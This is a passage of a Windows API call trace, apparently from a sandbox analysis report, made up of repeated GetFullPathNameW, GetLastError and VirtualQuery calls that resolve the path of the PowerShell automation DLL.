lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.494] GetLastError () returned 0x0 [0050.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.494] GetLastError () returned 0x0 [0050.494] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.494] VirtualQuery (in: lpAddress=0x19cde0, lpBuffer=0x19dde0, dwLength=0x1c | out: lpBuffer=0x19dde0*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.494] GetLastError () returned 0x0 [0050.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.494] GetLastError () returned 0x0 [0050.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.495] GetLastError () returned 0x0 [0050.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.495] GetLastError () returned 0x0 [0050.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.495] GetLastError () returned 0x0 [0050.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.495] GetLastError () returned 0x0 [0050.495] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.495] VirtualQuery (in: lpAddress=0x19cde0, lpBuffer=0x19dde0, dwLength=0x1c | out: lpBuffer=0x19dde0*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.496] GetLastError () returned 0x0 [0050.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.496] GetLastError () returned 0x0 [0050.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.496] GetLastError () returned 0x0 [0050.496] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.496] VirtualQuery (in: lpAddress=0x19cde0, lpBuffer=0x19dde0, dwLength=0x1c | out: lpBuffer=0x19dde0*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.496] GetLastError () returned 0x0 [0050.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.496] GetLastError () returned 0x0 [0050.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.496] GetLastError () returned 0x0 [0050.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.496] GetLastError () returned 0x0 [0050.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.496] GetLastError () returned 0x0 [0050.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.497] GetLastError () returned 0x0 [0050.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.497] GetLastError () returned 0x0 [0050.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.497] GetLastError () returned 0x0 [0050.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.497] GetLastError () returned 0x0 [0050.497] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.497] VirtualQuery (in: lpAddress=0x19cde0, lpBuffer=0x19dde0, dwLength=0x1c | out: lpBuffer=0x19dde0*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.497] GetLastError () returned 0x0 [0050.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.497] GetLastError () returned 0x0 [0050.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.497] GetLastError () returned 0x0 [0050.498] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.498] VirtualQuery (in: lpAddress=0x19cde0, lpBuffer=0x19dde0, dwLength=0x1c | out: lpBuffer=0x19dde0*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.498] GetLastError () returned 0x0 [0050.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.498] GetLastError () returned 0x0 [0050.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.498] GetLastError () returned 0x0 [0050.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.498] GetLastError () returned 0x0 [0050.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.498] GetLastError () returned 0x0 [0050.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.498] GetLastError () returned 0x0 [0050.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.498] GetLastError () returned 0x0 [0050.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.498] GetLastError () returned 0x0 [0050.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.499] GetLastError () returned 0x0 [0050.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.499] GetLastError () returned 0x0 [0050.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.499] GetLastError () returned 0x0 [0050.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.499] GetLastError () returned 0x0 [0050.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.499] GetLastError () returned 0x0 [0050.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.499] GetLastError () returned 0x0 [0050.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.499] GetLastError () returned 0x0 [0050.499] VirtualQuery (in: lpAddress=0x19d214, lpBuffer=0x19e214, dwLength=0x1c | out: lpBuffer=0x19e214*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.500] GetLastError () returned 0x0 [0050.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.501] GetLastError () returned 0x0 [0050.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.501] GetLastError () returned 0x0 [0050.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.501] GetLastError () returned 0x0 [0050.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.501] GetLastError () returned 0x0 [0050.501] VirtualQuery (in: lpAddress=0x19d214, lpBuffer=0x19e214, dwLength=0x1c | out: lpBuffer=0x19e214*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.501] GetLastError () returned 0x0 [0050.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.501] GetLastError () returned 0x0 [0050.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", 